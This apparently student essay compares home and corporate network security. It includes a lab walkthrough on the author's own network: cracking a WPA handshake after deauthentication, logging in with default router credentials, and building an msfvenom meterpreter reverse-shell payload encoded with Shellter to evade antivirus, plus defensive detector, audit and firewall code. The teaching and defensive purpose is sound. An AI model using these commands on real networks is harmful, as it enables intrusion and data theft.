
Technology is an integral part of nearly every aspect of life these days, so information being processed and stored by technology is commonplace. This raises the issue of how that information is secured. Oftentimes, people believe that the information on their home network is secure; however, they do little to protect that network, figuring that no one would bother to hack it since they are just one person. But how much of a risk is an insecure home network when there are so many companies out there with vulnerable networks as well?
People often forget that they have an abundance of personal information stored on their home networks, in addition to what they have given away to companies, and so they do not realize how important it is to keep their home network secure as well. This is a big issue, as it means that home networks are often left vulnerable to attack. I believe that I will find that home wireless networks are often much less secure than corporate networks, yet can provide a hacker with just as much important and personal data as a corporate network can.
Two main concepts need to be grasped to fully understand how important network security is. The first is the different security tools and techniques used in the two environments, and the second is how a corporate network differs from a home network. In many ways these two concepts merge, since corporate networks differ from home/personal networks largely in the tools they use and the systems they have implemented. Some of the important tools that need to be understood are a firewall, an intrusion prevention system (IPS), a modem/router, and databases. These devices may sound complex but are fairly simple once broken down. A firewall is a device or piece of software placed on a network to help ensure that only authorized users can access it. It does this by allowing or blocking traffic based on pre-defined rules: only certain devices may reach the network, and on a single device only certain software may use it.
An IPS is a system commonly used in corporate networks that does exactly what its name implies: it prevents intrusion from outside threats by watching network traffic for commonly used methods of hacking into a network and blocking them when they are found. These systems are often expensive and are not typically used on a home network.
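As an added example that is not part of the essay, here is the kind of check a wireless IDS/IPS performs to catch the de-authentication burst used later in the walkthrough (step 6): it counts deauth frames per sender in a sliding time window and alerts when a burst appears. The frame records are constructed, and the MAC addresses, window and threshold are assumptions.

```python
from collections import defaultdict, deque

# Constructed 802.11 management-frame records: (timestamp_s, subtype, src_mac, dst_mac).
# In practice these come from a monitor-mode capture; here one lone deauth (normal
# client roaming) is followed by a burst of 64 deauths sent with the AP's address.
AP_MAC = "aa:bb:cc:dd:ee:01"          # assumed address of the "Nighthawk" AP
SAMPLE_FRAMES = [
    (0.0, "beacon", AP_MAC, "ff:ff:ff:ff:ff:ff"),
    (1.2, "deauth", AP_MAC, "11:22:33:44:55:66"),   # single deauth, benign
    (30.0, "beacon", AP_MAC, "ff:ff:ff:ff:ff:ff"),
] + [
    (60.0 + i * 0.01, "deauth", AP_MAC, "ff:ff:ff:ff:ff:ff") for i in range(64)
]

DEAUTH_THRESHOLD = 10   # deauths from one sender within WINDOW_SECONDS -> alert
WINDOW_SECONDS = 1.0

def detect_deauth_floods(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Return one alert per offending sender as (src_mac, burst_start_ts, count).

    A per-sender deque holds deauth timestamps inside the sliding window; once
    it reaches the threshold the sender is reported and not reported again.
    """
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, subtype, src, _dst in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:          # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, q[0], len(q)))
    return alerts

if __name__ == "__main__":
    for src, start, count in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"ALERT deauth flood from {src}: {count} frames starting at t={start:.2f}s")
```

A real WIDS would also look at the reason code and receiver address, but the per-sender count alone separates the burst from ordinary roaming.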
Although a modem and a router are technically different devices, they are often combined into one these days, so I will explain them as one for the sake of simplicity and refer to the combination from here on as a combo router. The modem section of a combo router receives the internet connection from the Internet Service Provider (ISP, e.g., Comcast, AT&T, HughesNet, Starlink), decodes the signal, and gives your home (or an organization) an internet connection. The router part takes the connection that the modem receives and makes it usable over an Ethernet cable or over the Wi-Fi network it creates. Together, the router and modem in a combo router provide you with a Wi-Fi connection.
Databases are another kind of software commonly used by organizations. They store information about customers: phone numbers, email addresses, home addresses, credit card numbers, and so on. There are many different database systems that can be used to store this information, and each can be protected differently depending on how it is set up. The important thing to know about databases is that they very often hold sensitive customer information.
To prove just how much of an issue having an insecure home network is, I set up a network that I owned and hacked into it. The following demonstration is for educational purposes only to show the problems that come with having an insecure home network.
First, I set up a home network the way that most home networks are configured. This consisted of a combo router that was configured (these configuration steps are specific to your Internet Service Provider [ISP]) to run a wireless network that I named “Nighthawk”, with one of the most common passwords in the United States used as the password: “Password1”.
1. Then, I connected a new device to that network (in this case, it was a spare machine that was running the Windows 10 Operating System [OS]).
2. To test the strength of the Wi-Fi network’s security, I used a computer running the Kali Linux OS.
3. Using Airmon-ng, I put my computer into promiscuous mode.

4. After the network card was put into promiscuous mode, I used the command “sudo airodump-ng wlan0mon” to see the information about the network I created.

5. Using the information I gathered about the “Nighthawk” network, I listened to what devices were on the network and saved that information into a file for use later once the handshake was captured.

6. While that was running, I opened another new terminal tab and used the aireplay tool to send de-authentication packets to the devices on my network that I had connected to it, causing those devices to temporarily disconnect and then reconnect to the network.
7. Once that was completed successfully, the devices reconnected to the network instantly and provided me with the 3-Way handshake that I needed.

8. Since that 3-Way handshake was recorded in the “handshake.cap” file that I specified a couple of commands ago, I then used the Aircrack tool to crack the password stored in that handshake from the file by testing that file against a common wordlist of passwords (that comes pre-loaded onto Kali as well), known as “rockyou.txt”. This started running the software and, almost immediately, cracked the password in less than one second.

9. I then opened a terminal, reset my Wi-Fi card, and connected to the “Nighthawk” Wi-Fi network using the password I cracked.

10. Now that I was connected to the Wi-Fi network I hacked into, I immediately tested to see if the network administrator console was secure or not. I did this by finding the default route for the IP address under system settings.
11. After I found that IP address, I typed it into my web browser and was given a login prompt. I needed to know what type of router was being used however, so I ran the netdiscover command to discover what devices were connected to the network that I was now connected to. To do this, I opened a new terminal window and ran the command: “sudo netdiscover -i wlan0”. This uses a built-in tool that finds all devices connected to the same Wi-Fi network you are on and lets you know their IP addresses and vendors.

12. I saw that there was a device from Netgear that had the same IP address as the router. So, I did a quick search on the internet for default credentials for Netgear router admin consoles and was greeted on my first search with some results.

13. I tried the username “admin” and the password “password” and, sure enough, they worked, and I was let into the admin console for the router.

14. From there, I browsed through the different settings and had full access to change anything and do anything to the Wi-Fi network that I wanted, including changing the network’s name and password to whatever I wanted.

15. For the sake of the test, I did not change anything. However, I now had that ability. Instead, I turned my attention back to the other device that I saw was on the network from my “netdiscover” scan. This device (which I knew was my machine with Windows 10 on it) could have data that would be valuable to me (or in the real world, a malicious hacker), so I copied the IP address of that device.
16. After that was copied, I scanned for what ports were open on the IP address I found using the command: “sudo nmap -sV -sC -O -Pn 192.168.1.3”. This scanned the top 1000 ports to let me know if any of them were open and let me know what OS the computer was running.
17. The results of the Nmap scan came back with no open ports and a message saying there were too many potential OSs the machine could be running, so it was unsure about the OS.
18. I was not able to see that the computer was running Windows 10 from the Nmap scan, but it was a fair guess, as most home computers run Windows 10 at this point. If it was something else (such as macOS), it would show a different wireless card manufacturer for those types of machines. So, from there I opened software called msfvenom (pre-loaded onto Kali Linux), used for writing a lot of exploit scripts. I did this by opening a new terminal and typing “msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.1.6 LPORT=4444 -o coolfile.exe”.

19. After having that file created, I began using a program known as “Shellter” that encodes the payload to make it virtually unrecognizable as malicious by Windows.

20. After following the prompts from the Shellter software, I had a malicious payload that was nearly undetectable by Windows.
*** NOTE: There are many ways to do the following steps and to transfer the file to the remote machine. I opted for a flash drive, which would require some form of social engineering to get the device owner to plug it into their machine. Though there are many other methods that I could have used that would have been remote, I did not have a machine that was old enough to use a more vulnerable or unpatched version of Windows, and using an actual exploit for Windows 10 would have taken me a much larger amount of time to do, so I opted to transfer the file via a USB thumb drive for testing purposes. ***
21. Then, I copied the file that was created from the previous commands onto a USB thumb drive and copied it to my Windows 10 machine from the thumb drive.
22. On my Kali machine, I then started a program that is called Metasploit (which is also freely available and comes pre-loaded onto Kali).
23. From there, I proceeded to navigate to the listener module that I wanted to use, specified that I wanted it to listen for my msfvenom script’s connection, and told it to listen on my IP address before typing “run” and hitting enter. This started the listener.

24. I then copied the malicious file over to the desktop of the Windows 10 computer (though this is not necessary for the exploit to run) and then double-clicked on the file, which ran the script I put into the file in the background (making it look like nothing happened on the Windows machine).
25. Immediately on my Kali machine, the listener recognized the connection and gave me a meterpreter shell (a special shell that is created by Metasploit) with full access to all the files on the computer, including the photos, the documents, and everything else, exposing a whole bunch of sensitive information.

26. I was able to then type “shell” to get a local shell that used Windows’ CMD commands.

27. After I had that shell, all that I had to do was browse through the computer’s directories and see if I could find any valuable information. In this case, I was able to browse to the user’s “Documents” folder and find a file called “Super Secret Passwords.txt”. I opened the file and was greeted with (simulated) bank account information.
*** NOTE: Though the way that the document is stored in the above example and the ease of access to this file may seem unreasonable, it is not uncommon for people to store all of their passwords in a document that is just saved to their desktop or local computer without a password even set on the document. However, in the end, this is just a test scenario as well. ***
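The walkthrough succeeded because of settings a homeowner can check before anyone else does: a Wi-Fi passphrase that appears in a common wordlist or is simply short, and an admin console still using vendor default credentials. As an added example (not from the essay), the audit below reports those conditions for a router configuration; the config key names, the tiny stand-in wordlist, the length policy, and the default-credential pairs other than "admin"/"password" are assumptions.

```python
# Constructed stand-in for a common-password list. rockyou.txt has millions of
# entries, so a real run would use load_wordlist() below rather than a literal.
COMMON_PASSWORDS = {"password", "password1", "123456", "qwerty", "admin", "letmein"}

# Vendor default admin logins as (username, password). "admin"/"password" is the
# pair the essay found on its router; the other entries are illustrative placeholders.
DEFAULT_ADMIN_CREDENTIALS = {("admin", "password"), ("admin", "admin"), ("admin", "1234")}

MIN_PASSPHRASE_LENGTH = 12   # assumed policy minimum

def load_wordlist(path):
    """Read a wordlist such as rockyou.txt into a lowercased set (helper for real runs)."""
    with open(path, encoding="latin-1") as fh:
        return {line.rstrip("\r\n").lower() for line in fh if line.strip()}

def audit_router(config, common_passwords=COMMON_PASSWORDS):
    """Return (severity, finding) tuples for a router config dict.

    Expected keys (assumed names): ssid, wifi_password, wifi_security,
    admin_user, admin_password.
    """
    findings = []
    pw = config.get("wifi_password", "")
    ssid = config.get("ssid", "")
    if pw.lower() in common_passwords:
        findings.append(("critical", "Wi-Fi passphrase appears in a common-password list"))
    if len(pw) < MIN_PASSPHRASE_LENGTH:
        findings.append(("high", f"Wi-Fi passphrase shorter than {MIN_PASSPHRASE_LENGTH} characters"))
    if ssid and ssid.lower() in pw.lower():
        findings.append(("high", "Wi-Fi passphrase contains the network name"))
    if config.get("wifi_security") not in ("WPA2", "WPA3"):
        findings.append(("critical", "Wireless security mode is not WPA2 or WPA3"))
    admin = (config.get("admin_user", ""), config.get("admin_password", ""))
    if admin in DEFAULT_ADMIN_CREDENTIALS:
        findings.append(("critical", "Admin console uses vendor default credentials"))
    elif admin[1].lower() in common_passwords:
        findings.append(("high", "Admin console password appears in a common-password list"))
    return findings

# Constructed config mirroring the essay's lab setup ("Nighthawk" / "Password1",
# admin / password). The security mode is an assumption; the essay only says WPA.
ESSAY_SETUP = {"ssid": "Nighthawk", "wifi_password": "Password1", "wifi_security": "WPA2",
               "admin_user": "admin", "admin_password": "password"}
HARDENED_SETUP = {"ssid": "Nighthawk", "wifi_password": "glacier-Tuba-parade-9041",
                  "wifi_security": "WPA3", "admin_user": "owner",
                  "admin_password": "Vq7!pnL2#sdRw8Ke"}
```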
The results of the testing were as expected, and I was able to hack into the Wi-Fi network and the Windows 10 machine with minimal effort, whereas a hacker attempting to hack into a corporate network would have taken much longer and hit a tremendous number of roadblocks if they had done the same thing as was done for the home network. There were practically no challenges in hacking into the home network, and the test was highly effective and proved my initial hypothesis to be true.
Corporate networks are commonly incredibly complex, with multiple levels of routing and switching in between, but they are also secured by much more complex layers of security than a home network is. These layers of protection are commonly (at minimum) made up of a firewall, an IDS/IPS, and a database. Because of this, pretty much every enterprise-level network setup would easily have detected (and likely stopped) the attack that I used on the home network within minutes or even seconds. An IPS would have detected and prevented the de-authentication requests I sent to the network to try to get the WPA handshake that allowed me to grab the Wi-Fi password key and crack it. An enterprise-grade firewall would have easily detected my reverse shell (through most methods by which I could have gotten it onto the target computer, as well as the actual connection itself) and blocked it from ever reaching back out to my machine. The sensitive information that I showed an example of at the end of the process would have been stored inside a database that (almost certainly) would have kept the data in an encrypted format, unreadable to me without a key to decrypt it. All these devices would have rendered virtually every part of my basic home network hack useless, and I likely would have gotten caught and arrested if I had attempted this on a corporate network.
Though it is true that not every corporate network is set up this securely, and that at times there may be loopholes, exceptions, and modifications to the above analysis, the same could be said of home networks that are well defended. At the most basic level, this analysis holds true for most corporate networks and proves that it would be much easier for a malicious hacker to steal data from a home Wi-Fi network than it would be to steal that same data from an enterprise network.
Though a malicious hacker would gain some benefits from compromising this same data on an enterprise network (such as obtaining a tremendous amount more personal data than the few people's worth found on a home network), the risk often seems to outweigh the reward for a malicious hacker. The low-hanging fruit of an insecure home network would still provide the malicious hacker with a decent amount of information or monetary value (depending on the home network and the victim's data) that could be used in many ways for their own gain. This is why it is so vital for home networks to be secured properly and for those who own the networks to know how to protect them.
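The firewall claim above can be made concrete. As an added example that is not from the essay, the rule table below is a first-match, default-deny egress policy of the kind a workstation or perimeter firewall enforces; run against three constructed flows from the Windows host, it passes DNS and HTTPS and drops the reverse_tcp callback to 192.168.1.6:4444 from step 18. The rule set, the public address 203.0.113.10, and the Rule field names are assumptions.

```python
import ipaddress
from dataclasses import dataclass

@dataclass(frozen=True)
class Rule:
    action: str        # "allow" or "deny"
    proto: str         # "tcp", "udp" or "any"
    dst_net: str       # CIDR the destination address must fall in
    dst_ports: tuple   # destination ports the rule covers; () means any port

def rule_matches(rule, proto, dst_ip, dst_port):
    return (rule.proto in ("any", proto)
            and ipaddress.ip_address(dst_ip) in ipaddress.ip_network(rule.dst_net)
            and (not rule.dst_ports or dst_port in rule.dst_ports))

# Constructed first-match egress policy for a workstation on 192.168.1.0/24.
# Lateral connections to other LAN hosts are denied before the web allow, so a
# listener on a neighbouring machine cannot be reached on any port. A callback
# to an internet host on 443 would still pass this table, which is why the
# essay's inspection layer (IDS/IPS) matters alongside the rule set.
EGRESS_POLICY = [
    Rule("allow", "udp", "192.168.1.1/32", (53,)),   # DNS to the router only
    Rule("deny",  "any", "192.168.1.0/24", ()),       # no workstation-to-workstation
    Rule("allow", "tcp", "0.0.0.0/0", (80, 443)),     # web
    Rule("deny",  "any", "0.0.0.0/0", ()),            # default deny
]

def evaluate(policy, proto, dst_ip, dst_port):
    """Return (action, index_of_matching_rule); an unmatched flow is denied."""
    for index, rule in enumerate(policy):
        if rule_matches(rule, proto, dst_ip, dst_port):
            return rule.action, index
    return "deny", None

# Constructed flows leaving the Windows host 192.168.1.3: DNS, HTTPS, and the
# reverse_tcp callback to the listener address/port used in the walkthrough.
SAMPLE_FLOWS = [
    ("udp", "192.168.1.1", 53),
    ("tcp", "203.0.113.10", 443),
    ("tcp", "192.168.1.6", 4444),
]

def blocked_flows(policy, flows):
    """Return the flows the policy would drop."""
    return [flow for flow in flows if evaluate(policy, *flow)[0] == "deny"]

if __name__ == "__main__":
    for flow in SAMPLE_FLOWS:
        action, index = evaluate(EGRESS_POLICY, *flow)
        print(f"{flow[0]} -> {flow[1]}:{flow[2]}  {action} (rule {index})")
```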